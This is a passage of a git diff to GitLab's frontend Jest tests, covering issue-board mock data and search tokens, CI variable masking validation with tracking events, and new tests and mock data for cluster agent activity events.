b/spec/frontend/boards/mock_data.js @@ -2,12 +2,11 @@ import { GlFilteredSearchToken } from '@gitlab/ui'; import { keyBy } from 'lodash'; import { ListType } from '~/boards/constants'; import { __ } from '~/locale'; -import { DEFAULT_MILESTONES_GRAPHQL } from '~/vue_shared/components/filtered_search_bar/constants'; import AuthorToken from '~/vue_shared/components/filtered_search_bar/tokens/author_token.vue'; import EmojiToken from '~/vue_shared/components/filtered_search_bar/tokens/emoji_token.vue'; import LabelToken from '~/vue_shared/components/filtered_search_bar/tokens/label_token.vue'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; +import ReleaseToken from '~/vue_shared/components/filtered_search_bar/tokens/release_token.vue'; export const boardObj = { id: 1, @@ -21,7 +20,6 @@ export const listObj = { position: 0, title: 'Test', list_type: 'label', - weight: 3, label: { id: 5000, title: 'Test', @@ -154,7 +152,6 @@ export const rawIssue = { iid: '27', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: 'gitlab-org/test-subgroup/gitlab-test#27', path: '/gitlab-org/test-subgroup/gitlab-test/-/issues/27', @@ -184,7 +181,6 @@ export const mockIssue = { title: 'Issue 1', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: `${mockIssueFullPath}#27`, path: `/${mockIssueFullPath}/-/issues/27`, @@ -216,7 +212,6 @@ export const mockIssue2 = { title: 'Issue 2', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: 'gitlab-org/test-subgroup/gitlab-test#28', path: '/gitlab-org/test-subgroup/gitlab-test/-/issues/28', @@ -234,7 +229,6 @@ export const mockIssue3 = { referencePath: '#29', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, path: '/gitlab-org/gitlab-test/-/issues/28', assignees, @@ -249,7 +243,6 @@ export 
const mockIssue4 = { referencePath: '#30', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, path: '/gitlab-org/gitlab-test/-/issues/28', assignees, @@ -551,7 +544,7 @@ export const mockMoveData = { }; export const mockEmojiToken = { - type: 'my_reaction_emoji', + type: 'my-reaction', icon: 'thumb-up', title: 'My-Reaction', unique: true, @@ -559,11 +552,24 @@ export const mockEmojiToken = { fetchEmojis: expect.any(Function), }; -export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) => [ +export const mockConfidentialToken = { + type: 'confidential', + icon: 'eye-slash', + title: 'Confidential', + unique: true, + token: GlFilteredSearchToken, + operators: [{ value: '=', description: 'is' }], + options: [ + { icon: 'eye-slash', value: 'yes', title: 'Yes' }, + { icon: 'eye', value: 'no', title: 'No' }, + ], +}; + +export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, isSignedIn) => [ { icon: 'user', title: __('Assignee'), - type: 'assignee_username', + type: 'assignee', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -576,7 +582,7 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) { icon: 'pencil', title: __('Author'), - type: 'author_username', + type: 'author', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -590,7 +596,7 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) { icon: 'labels', title: __('Label'), - type: 'label_name', + type: 'label', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -600,21 +606,20 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) symbol: '~', fetchLabels, }, - ...(hasEmoji ? [mockEmojiToken] : []), + ...(isSignedIn ? 
[mockEmojiToken, mockConfidentialToken] : []), { icon: 'clock', title: __('Milestone'), symbol: '%', - type: 'milestone_title', + type: 'milestone', token: MilestoneToken, unique: true, - defaultMilestones: DEFAULT_MILESTONES_GRAPHQL, fetchMilestones, }, { icon: 'issues', title: __('Type'), - type: 'types', + type: 'type', token: GlFilteredSearchToken, unique: true, options: [ @@ -623,11 +628,11 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) ], }, { - icon: 'weight', - title: __('Weight'), - type: 'weight', - token: WeightToken, - unique: true, + type: 'release', + title: __('Release'), + icon: 'rocket', + token: ReleaseToken, + fetchReleases: expect.any(Function), }, ]; @@ -670,3 +675,14 @@ export const mockGroupLabelsResponse = { }, }, }; + +export const boardListQueryResponse = (issuesCount = 20) => ({ + data: { + boardList: { + __typename: 'BoardList', + id: 'gid://gitlab/BoardList/5', + totalWeight: 5, + issuesCount, + }, + }, +}); diff --git a/spec/frontend/boards/stores/actions_spec.js b/spec/frontend/boards/stores/actions_spec.js index e245325b956..51340a3ea4f 100644 --- a/spec/frontend/boards/stores/actions_spec.js +++ b/spec/frontend/boards/stores/actions_spec.js @@ -20,7 +20,7 @@ import { formatIssue, getMoveData, updateListPosition, -} from '~/boards/boards_util'; +} from 'ee_else_ce/boards/boards_util'; import { gqlClient } from '~/boards/graphql'; import destroyBoardListMutation from '~/boards/graphql/board_list_destroy.mutation.graphql'; import issueCreateMutation from '~/boards/graphql/issue_create.mutation.graphql'; @@ -1241,6 +1241,7 @@ describe('updateIssueOrder', () => { moveBeforeId: undefined, moveAfterId: undefined, }, + update: expect.anything(), }; jest.spyOn(gqlClient, 'mutate').mockResolvedValue({ data: { @@ -1447,6 +1448,7 @@ describe('addListNewIssue', () => { variables: { input: formatIssueInput(mockIssue, stateWithBoardConfig.boardConfig), }, + update: expect.anything(), }); }); @@ -1478,6 +1480,7 
@@ describe('addListNewIssue', () => { variables: { input: formatIssueInput(issue, stateWithBoardConfig.boardConfig), }, + update: expect.anything(), }); expect(payload.labelIds).toEqual(['gid://gitlab/GroupLabel/4', 'gid://gitlab/GroupLabel/5']); expect(payload.assigneeIds).toEqual(['gid://gitlab/User/1', 'gid://gitlab/User/2']); @@ -1570,7 +1573,7 @@ describe('addListNewIssue', () => { describe('setActiveIssueLabels', () => { const state = { boardItems: { [mockIssue.id]: mockIssue } }; - const getters = { activeBoardItem: mockIssue }; + const getters = { activeBoardItem: { ...mockIssue, labels } }; const testLabelIds = labels.map((label) => label.id); const input = { labelIds: testLabelIds, @@ -1579,11 +1582,7 @@ describe('setActiveIssueLabels', () => { labels, }; - it('should assign labels on success', (done) => { - jest - .spyOn(gqlClient, 'mutate') - .mockResolvedValue({ data: { updateIssue: { issue: { labels: { nodes: labels } } } } }); - + it('should assign labels', () => { const payload = { itemId: getters.activeBoardItem.id, prop: 'labels', @@ -1601,74 +1600,28 @@ describe('setActiveIssueLabels', () => { }, ], [], - done, ); }); - it('throws error if fails', async () => { - jest - .spyOn(gqlClient, 'mutate') - .mockResolvedValue({ data: { updateIssue: { errors: ['failed mutation'] } } }); - - await expect(actions.setActiveIssueLabels({ getters }, input)).rejects.toThrow(Error); - }); - - describe('labels_widget FF on', () => { - beforeEach(() => { - window.gon = { - features: { labelsWidget: true }, - }; - - getters.activeBoardItem = { ...mockIssue, labels }; - }); - - afterEach(() => { - window.gon = { - features: {}, - }; - }); - - it('should assign labels', () => { - const payload = { - itemId: getters.activeBoardItem.id, - prop: 'labels', - value: labels, - }; - - testAction( - actions.setActiveIssueLabels, - input, - { ...state, ...getters }, - [ - { - type: types.UPDATE_BOARD_ITEM_BY_ID, - payload, - }, - ], - [], - ); - }); - - it('should remove 
label', () => { - const payload = { - itemId: getters.activeBoardItem.id, - prop: 'labels', - value: [labels[1]], - }; + it('should remove label', () => { + const payload = { + itemId: getters.activeBoardItem.id, + prop: 'labels', + value: [labels[1]], + }; - testAction( - actions.setActiveIssueLabels, - { ...input, removeLabelIds: [getIdFromGraphQLId(labels[0].id)] }, - { ...state, ...getters }, - [ - { - type: types.UPDATE_BOARD_ITEM_BY_ID, - payload, - }, - ], - [], - ); - }); + testAction( + actions.setActiveIssueLabels, + { ...input, removeLabelIds: [getIdFromGraphQLId(labels[0].id)] }, + { ...state, ...getters }, + [ + { + type: types.UPDATE_BOARD_ITEM_BY_ID, + payload, + }, + ], + [], + ); }); }); diff --git a/spec/frontend/ci_lint/components/ci_lint_spec.js b/spec/frontend/ci_lint/components/ci_lint_spec.js index 36d860b1ccd..70d116c12d3 100644 --- a/spec/frontend/ci_lint/components/ci_lint_spec.js +++ b/spec/frontend/ci_lint/components/ci_lint_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import waitForPromises from 'helpers/wait_for_promises'; import CiLint from '~/ci_lint/components/ci_lint.vue'; import CiLintResults from '~/pipeline_editor/components/lint/ci_lint_results.vue'; -import lintCIMutation from '~/pipeline_editor/graphql/mutations/lint_ci.mutation.graphql'; +import lintCIMutation from '~/pipeline_editor/graphql/mutations/client/lint_ci.mutation.graphql'; import SourceEditor from '~/vue_shared/components/source_editor.vue'; import { mockLintDataValid } from '../mock_data'; diff --git a/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js b/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js index 5c7404c1175..7c4ff67feb3 100644 --- a/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js +++ b/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js @@ -1,9 +1,10 @@ import { GlButton, GlFormInput } from '@gitlab/ui'; import { createLocalVue, shallowMount, mount } 
from '@vue/test-utils'; import Vuex from 'vuex'; +import { mockTracking } from 'helpers/tracking_helper'; import CiEnvironmentsDropdown from '~/ci_variable_list/components/ci_environments_dropdown.vue'; import CiVariableModal from '~/ci_variable_list/components/ci_variable_modal.vue'; -import { AWS_ACCESS_KEY_ID } from '~/ci_variable_list/constants'; +import { AWS_ACCESS_KEY_ID, EVENT_LABEL, EVENT_ACTION } from '~/ci_variable_list/constants'; import createStore from '~/ci_variable_list/store'; import mockData from '../services/mock_data'; import ModalStub from '../stubs'; @@ -14,9 +15,12 @@ localVue.use(Vuex); describe('Ci variable modal', () => { let wrapper; let store; + let trackingSpy; + + const maskableRegex = '^[a-zA-Z0-9_+=/@:.~-]{8,}$'; const createComponent = (method, options = {}) => { - store = createStore({ isGroup: options.isGroup }); + store = createStore({ maskableRegex, isGroup: options.isGroup }); wrapper = method(CiVariableModal, { attachTo: document.body, stubs: { @@ -138,6 +142,7 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = invalidKeyVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); it(`${rendered ? 
'renders' : 'does not render'} the variable reference warning`, () => { @@ -226,6 +231,7 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = invalidMaskVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); it('disables the submit button', () => { @@ -235,6 +241,50 @@ describe('Ci variable modal', () => { it('shows the correct error text', () => { expect(findModal().text()).toContain(maskError); }); + + it('sends the correct tracking event', () => { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTION, { + label: EVENT_LABEL, + property: ';', + }); + }); + }); + + describe.each` + value | secret | masked | eventSent | trackingErrorProperty + ${'value'} | ${'secretValue'} | ${false} | ${0} | ${null} + ${'shortMasked'} | ${'short'} | ${true} | ${0} | ${null} + ${'withDollar$Sign'} | ${'dollar$ign'} | ${false} | ${1} | ${'$'} + ${'withDollar$Sign'} | ${'dollar$ign'} | ${true} | ${1} | ${'$'} + ${'unsupported'} | ${'unsupported|char'} | ${true} | ${1} | ${'|'} + ${'unsupportedMasked'} | ${'unsupported|char'} | ${false} | ${0} | ${null} + `('Adding a new variable', ({ value, secret, masked, eventSent, trackingErrorProperty }) => { + beforeEach(() => { + const [variable] = mockData.mockVariables; + const invalidKeyVariable = { + ...variable, + key: 'key', + value, + secret_value: secret, + masked, + }; + createComponent(mount); + store.state.variable = invalidKeyVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it(`${ + eventSent > 0 ? 
'sends the correct' : 'does not send the' + } variable validation tracking event`, () => { + expect(trackingSpy).toHaveBeenCalledTimes(eventSent); + + if (eventSent > 0) { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTION, { + label: EVENT_LABEL, + property: trackingErrorProperty, + }); + } + }); }); describe('when both states are valid', () => { @@ -249,7 +299,6 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = validMaskandKeyVariable; - store.state.maskableRegex = /^[a-zA-Z0-9_+=/@:.~-]{8,}$/; }); it('does not disable the submit button', () => { diff --git a/spec/frontend/clusters/agents/components/activity_events_list_spec.js b/spec/frontend/clusters/agents/components/activity_events_list_spec.js new file mode 100644 index 00000000000..4abbd77dfb7 --- /dev/null +++ b/spec/frontend/clusters/agents/components/activity_events_list_spec.js @@ -0,0 +1,102 @@ +import { GlLoadingIcon, GlAlert, GlEmptyState } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { useFakeDate } from 'helpers/fake_date'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import ActivityEvents from '~/clusters/agents/components/activity_events_list.vue'; +import ActivityHistoryItem from '~/clusters/agents/components/activity_history_item.vue'; +import getAgentActivityEventsQuery from '~/clusters/agents/graphql/queries/get_agent_activity_events.query.graphql'; +import { mockResponse, mockEmptyResponse } from '../../mock_data'; + +const activityEmptyStateImage = '/path/to/image'; +const projectPath = 'path/to/project'; +const agentName = 'cluster-agent'; + +Vue.use(VueApollo); + +describe('ActivityEvents', () => { + let wrapper; + useFakeDate([2021, 12, 3]); + + const provideData = { + agentName, + projectPath, + activityEmptyStateImage, + }; + + const 
createWrapper = ({ queryResponse = null } = {}) => { + const agentEventsQueryResponse = queryResponse || jest.fn().mockResolvedValue(mockResponse); + const apolloProvider = createMockApollo([ + [getAgentActivityEventsQuery, agentEventsQueryResponse], + ]); + + wrapper = shallowMountExtended(ActivityEvents, { + apolloProvider, + provide: provideData, + }); + }; + + const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); + const findAlert = () => wrapper.findComponent(GlAlert); + const findEmptyState = () => wrapper.findComponent(GlEmptyState); + const findAllActivityHistoryItems = () => wrapper.findAllComponents(ActivityHistoryItem); + const findSectionTitle = (at) => wrapper.findAllByTestId('activity-section-title').at(at); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('while the agentEvents query is loading', () => { + it('displays a loading icon', async () => { + createWrapper(); + + expect(findLoadingIcon().exists()).toBe(true); + await waitForPromises(); + expect(findLoadingIcon().exists()).toBe(false); + }); + }); + + describe('when the agentEvents query has errored', () => { + beforeEach(() => { + createWrapper({ queryResponse: jest.fn().mockRejectedValue() }); + return waitForPromises(); + }); + + it('displays an alert message', () => { + expect(findAlert().exists()).toBe(true); + }); + }); + + describe('when there are no agentEvents', () => { + beforeEach(() => { + createWrapper({ queryResponse: jest.fn().mockResolvedValue(mockEmptyResponse) }); + }); + + it('displays an empty state with the correct illustration', () => { + expect(findEmptyState().exists()).toBe(true); + expect(findEmptyState().props('svgPath')).toBe(activityEmptyStateImage); + }); + }); + + describe('when the agentEvents are present', () => { + const length = mockResponse.data?.project?.clusterAgent?.activityEvents?.nodes?.length; + + beforeEach(() => { + createWrapper(); + }); + it('renders an activity-history-item components for every event', () => { + 
expect(findAllActivityHistoryItems()).toHaveLength(length); + }); + + it.each` + recordedAt | date | lineNumber + ${'2021-12-03T01:06:56Z'} | ${'Today'} | ${0} + ${'2021-12-02T19:26:56Z'} | ${'Yesterday'} | ${1} + ${'2021-11-22T19:26:56Z'} | ${'2021-11-22'} | ${2} + `('renders correct titles for different days', ({ date, lineNumber }) => { + expect(findSectionTitle(lineNumber).text()).toBe(date); + }); + }); +}); diff --git a/spec/frontend/clusters/agents/components/activity_history_item_spec.js b/spec/frontend/clusters/agents/components/activity_history_item_spec.js new file mode 100644 index 00000000000..100a280d0cc --- /dev/null +++ b/spec/frontend/clusters/agents/components/activity_history_item_spec.js @@ -0,0 +1,56 @@ +import { GlSprintf } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import { sprintf } from '~/locale'; +import HistoryItem from '~/vue_shared/components/registry/history_item.vue'; +import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; +import ActivityHistoryItem from '~/clusters/agents/components/activity_history_item.vue'; +import { EVENT_DETAILS, DEFAULT_ICON } from '~/clusters/agents/constants'; +import { mockAgentHistoryActivityItems } from '../../mock_data'; + +const agentName = 'cluster-agent'; + +describe('ActivityHistoryItem', () => { + let wrapper; + + const createWrapper = ({ event = {} }) => { + wrapper = shallowMount(ActivityHistoryItem, { + propsData: { event }, + stubs: { + HistoryItem, + GlSprintf, + }, + }); + }; + + const findHistoryItem = () => wrapper.findComponent(HistoryItem); + const findTimeAgo = () => wrapper.find(TimeAgoTooltip); + + afterEach(() => { + wrapper.destroy(); + }); + + describe.each` + kind | icon | title | lineNumber + ${'token_created'} | ${EVENT_DETAILS.token_created.eventTypeIcon} | ${sprintf(EVENT_DETAILS.token_created.title, { tokenName: agentName })} | ${0} + ${'token_revoked'} | ${EVENT_DETAILS.token_revoked.eventTypeIcon} | 
${sprintf(EVENT_DETAILS.token_revoked.title, { tokenName: agentName })} | ${1} + ${'agent_connected'} | ${EVENT_DETAILS.agent_connected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_connected.title, { titleIcon: '' })} | ${2} + ${'agent_disconnected'} | ${EVENT_DETAILS.agent_disconnected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_disconnected.title, { titleIcon: '' })} | ${3} + ${'agent_connected'} | ${EVENT_DETAILS.agent_connected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_connected.title, { titleIcon: '' })} | ${4} + ${'unknown_agent'} | ${DEFAULT_ICON} | ${'unknown_agent Event occurred'} | ${5} + `('when the event type is $kind event', ({ icon, title, lineNumber }) => { + beforeEach(() => { + const event = mockAgentHistoryActivityItems[lineNumber]; + createWrapper({ event }); + }); + it('renders the correct icon', () => { + expect(findHistoryItem().props('icon')).toBe(icon); + }); + it('renders the correct title', () => { + expect(findHistoryItem().text()).toContain(title); + }); + it('renders the correct time-ago tooltip', () => { + const activityEvents = mockAgentHistoryActivityItems; + expect(findTimeAgo().props('time')).toBe(activityEvents[lineNumber].recordedAt); + }); + }); +}); diff --git a/spec/frontend/clusters/agents/components/show_spec.js b/spec/frontend/clusters/agents/components/show_spec.js index c502e7d813e..d5a8117f48c 100644 --- a/spec/frontend/clusters/agents/components/show_spec.js +++ b/spec/frontend/clusters/agents/components/show_spec.js @@ -5,6 +5,7 @@ import VueApollo from 'vue-apollo'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import ClusterAgentShow from '~/clusters/agents/components/show.vue'; import TokenTable from '~/clusters/agents/components/token_table.vue'; +import ActivityEvents from '~/clusters/agents/components/activity_events_list.vue'; import getAgentQuery from '~/clusters/agents/graphql/queries/get_cluster_agent.query.graphql'; import { useFakeDate } from 'helpers/fake_date'; import 
createMockApollo from 'helpers/mock_apollo_helper'; @@ -27,6 +28,7 @@ describe('ClusterAgentShow', () => { id: '1', createdAt: '2021-02-13T00:00:00Z', createdByUser: { + id: 'user-1', name: 'user-1', }, name: 'token-1', @@ -39,7 +41,8 @@ describe('ClusterAgentShow', () => { const createWrapper = ({ clusterAgent, queryResponse = null }) => { const agentQueryResponse = - queryResponse || jest.fn().mockResolvedValue({ data: { project: { clusterAgent } } }); + queryResponse || + jest.fn().mockResolvedValue({ data: { project: { id: 'project-1', clusterAgent } } }); const apolloProvider = createMockApollo([[getAgentQuery, agentQueryResponse]]); wrapper = extendedWrapper( @@ -70,6 +73,7 @@ describe('ClusterAgentShow', () => { const findPaginationButtons = () => wrapper.findComponent(GlKeysetPagination); const findTokenCount = () => wrapper.findByTestId('cluster-agent-token-count').text(); const findEESecurityTabSlot = () => wrapper.findByTestId('ee-security-tab'); + const findActivity = () => wrapper.findComponent(ActivityEvents); afterEach(() => { wrapper.destroy(); @@ -101,6 +105,10 @@ describe('ClusterAgentShow', () => { it('should not render pagination buttons when there are no additional pages', () => { expect(findPaginationButtons().exists()).toBe(false); }); + + it('renders activity events list', () => { + expect(findActivity().exists()).toBe(true); + }); }); describe('when create user is unknown', () => { diff --git a/spec/frontend/clusters/mock_data.js b/spec/frontend/clusters/mock_data.js new file mode 100644 index 00000000000..75306ca0295 --- /dev/null +++ b/spec/frontend/clusters/mock_data.js @@ -0,0 +1,165 @@ +const user = { + id: 1, + name: 'Administrator', + username: 'root', + webUrl: 'http://172.31.0.1:3000/root', +}; + +const agentToken = { + id: 1, + name: 'cluster-agent', +}; + +export const defaultActivityEvent = { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, +}; + +export const 
mockAgentActivityEvents = [ + { + kind: 'token_created', + level: 'info', + recordedAt: '2021-12-03T01:06:56Z', + agentToken, + user, + }, + + { + kind: 'token_revoked', + level: 'info', + recordedAt: '2021-12-03T00:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_disconnected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + }, +]; + +export const mockResponse = { + data: { + project: { + id: 'project-1', + clusterAgent: { + id: 'cluster-agent', + activityEvents: { + nodes: mockAgentActivityEvents, + }, + }, + }, + }, +}; + +export const mockEmptyResponse = { + data: { + project: { + id: 'project-1', + clusterAgent: { + id: 'cluster-agent', + activityEvents: { + nodes: [], + }, + }, + }, + }, +}; + +export const mockAgentHistoryActivityItems = [ + { + kind: 'token_created', + level: 'info', + recordedAt: '2021-12-03T01:06:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'cluster-agent created', + body: 'Token created by Administrator', + }, + + { + kind: 'token_revoked', + level: 'info', + recordedAt: '2021-12-03T00:26:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'cluster-agent revoked', + body: 'Token revoked by Administrator', + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Connected', + body: 'Agent Connected', + }, + + { + kind: 'agent_disconnected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Not connected', + body: 'Agent Not connected', + }, + + { + kind: 'agent_connected', 
+ level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Connected', + body: 'Agent Connected', + }, + + { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'unknown_agent', + body: 'Event occurred', + }, +]; diff --git a/spec/frontend/clusters_list/components/agent_empty_state_spec.js b/spec/frontend/clusters_list/components/agent_empty_state_spec.js index 38f0e0ba2c4..ed2a0d0b97b 100644 --- a/spec/frontend/clusters_list/components/agent_empty_state_spec.js +++ b/spec/frontend/clusters_list/components/agent_empty_state_spec.js @@ -1,34 +1,29 @@ -import { GlAlert, GlEmptyState, GlSprintf } from '@gitlab/ui'; +import { GlEmptyState, GlSprintf, GlLink, GlButton } from '@gitlab/ui'; import AgentEmptyState from '~/clusters_list/components/agent_empty_state.vue'; +import { INSTALL_AGENT_MODAL_ID } from '~/clusters_list/constants'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { helpPagePath } from '~/helpers/help_page_helper'; const emptyStateImage = '/path/to/image'; -const projectPath = 'path/to/project'; -const multipleClustersDocsUrl = helpPagePath('user/project/clusters/multiple_kubernetes_clusters'); -const installDocsUrl = helpPagePath('administration/clusters/kas'); +const installDocsUrl = helpPagePath('user/clusters/agent/index'); describe('AgentEmptyStateComponent', () => { let wrapper; - - const propsData = { - hasConfigurations: false, - }; const provideData = { emptyStateImage, - projectPath, }; - const findConfigurationsAlert = () => wrapper.findComponent(GlAlert); - const findMultipleClustersDocsLink = () => wrapper.findByTestId('multiple-clusters-docs-link'); - const findInstallDocsLink = () => wrapper.findByTestId('install-docs-link'); - const findIntegrationButton = () => 
wrapper.findByTestId('integration-primary-button'); + const findInstallDocsLink = () => wrapper.findComponent(GlLink); + const findIntegrationButton = () => wrapper.findComponent(GlButton); const findEmptyState = () => wrapper.findComponent(GlEmptyState); beforeEach(() => { wrapper = shallowMountExtended(AgentEmptyState, { - propsData, provide: provideData, + directives: { + GlModalDirective: createMockDirective(), + }, stubs: { GlEmptyState, GlSprintf }, }); }); @@ -39,33 +34,21 @@ describe('AgentEmptyStateComponent', () => { } }); - it('renders correct href attributes for the links', () => { - expect(findMultipleClustersDocsLink().attributes('href')).toBe(multipleClustersDocsUrl); - expect(findInstallDocsLink().attributes('href')).toBe(installDocsUrl); + it('renders the empty state', () => { + expect(findEmptyState().exists()).toBe(true); }); - describe('when there are no agent configurations in repository', () => { - it('should render notification message box', () => { - expect(findConfigurationsAlert().exists()).toBe(true); - }); + it('renders button for the agent registration', () => { + expect(findIntegrationButton().exists()).toBe(true); + }); - it('should disable integration button', () => { - expect(findIntegrationButton().attributes('disabled')).toBe('true'); - }); + it('renders correct href attributes for the docs link', () => { + expect(findInstallDocsLink().attributes('href')).toBe(installDocsUrl); }); - describe('when there is a list of agent configurations', () => { - beforeEach(() => { - propsData.hasConfigurations = true; - wrapper = shallowMountExtended(AgentEmptyState, { - propsData, - provide: provideData, - }); - }); - it('should render content without notification message box', () => { - expect(findEmptyState().exists()).toBe(true); - expect(findConfigurationsAlert().exists()).toBe(false); - expect(findIntegrationButton().attributes('disabled')).toBeUndefined(); - }); + it('renders correct modal id for the agent registration modal', () => { + 
const binding = getBinding(findIntegrationButton().element, 'gl-modal-directive'); + + expect(binding.value).toBe(INSTALL_AGENT_MODAL_ID); }); }); diff --git a/spec/frontend/clusters_list/components/agents_spec.js b/spec/frontend/clusters_list/components/agents_spec.js index 2dec7cdc973..c9ca10f6bf7 100644 --- a/spec/frontend/clusters_list/components/agents_spec.js +++ b/spec/frontend/clusters_list/components/agents_spec.js @@ -19,7 +19,6 @@ describe('Agents', () => { }; const provideData = { projectPath: 'path/to/project', - kasAddress: 'kas.example.com', }; const createWrapper = ({ props = {}, agents = [], pageInfo = null, trees = [], count = 0 }) => { @@ -27,6 +26,7 @@ describe('Agents', () => { const apolloQueryResponse = { data: { project: { + id: '1', clusterAgents: { nodes: agents, pageInfo, tokens: { nodes: [] }, count }, repository: { tree: { trees: { nodes: trees, pageInfo } } }, }, @@ -76,6 +76,7 @@ describe('Agents', () => { tokens: { nodes: [ { + id: 'token-1', lastUsedAt: testDate, }, ], @@ -87,6 +88,7 @@ describe('Agents', () => { const trees = [ { + id: 'tree-1', name: 'agent-2', path: '.gitlab/agents/agent-2', webPath: '/project/path/.gitlab/agents/agent-2', @@ -216,24 +218,6 @@ describe('Agents', () => { }); }); - describe('when the agent configurations are present', () => { - const trees = [ - { - name: 'agent-1', - path: '.gitlab/agents/agent-1', - webPath: '/project/path/.gitlab/agents/agent-1', - }, - ]; - - beforeEach(() => { - return createWrapper({ agents: [], trees }); - }); - - it('should pass the correct hasConfigurations boolean value to empty state component', () => { - expect(findEmptyState().props('hasConfigurations')).toEqual(true); - }); - }); - describe('when agents query has errored', () => { beforeEach(() => { return createWrapper({ agents: null }); diff --git a/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js b/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js index 
40c2c59e187..bcc1d4e8b9e 100644 --- a/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js +++ b/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js @@ -1,14 +1,7 @@ import { GlDropdown, GlDropdownItem } from '@gitlab/ui'; -import { createLocalVue, mount } from '@vue/test-utils'; -import VueApollo from 'vue-apollo'; +import { shallowMount } from '@vue/test-utils'; import AvailableAgentsDropdown from '~/clusters_list/components/available_agents_dropdown.vue'; import { I18N_AVAILABLE_AGENTS_DROPDOWN } from '~/clusters_list/constants'; -import agentConfigurationsQuery from '~/clusters_list/graphql/queries/agent_configurations.query.graphql'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import { agentConfigurationsResponse } from './mock_data'; - -const localVue = createLocalVue(); -localVue.use(VueApollo); describe('AvailableAgentsDropdown', () => { let wrapper; @@ -18,46 +11,19 @@ describe('AvailableAgentsDropdown', () => { const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); const findConfiguredAgentItem = () => findDropdownItems().at(0); - const createWrapper = ({ propsData = {}, isLoading = false }) => { - const provide = { - projectPath: 'path/to/project', - }; - - wrapper = (() => { - if (isLoading) { - const mocks = { - $apollo: { - queries: { - agents: { - loading: true, - }, - }, - }, - }; - - return mount(AvailableAgentsDropdown, { mocks, provide, propsData }); - } - - const apolloProvider = createMockApollo([ - [agentConfigurationsQuery, jest.fn().mockResolvedValue(agentConfigurationsResponse)], - ]); - - return mount(AvailableAgentsDropdown, { - localVue, - apolloProvider, - provide, - propsData, - }); - })(); + const createWrapper = ({ propsData }) => { + wrapper = shallowMount(AvailableAgentsDropdown, { + propsData, + }); }; afterEach(() => { wrapper.destroy(); - wrapper = null; }); describe('there are agents available', () => { const propsData = { + availableAgents: 
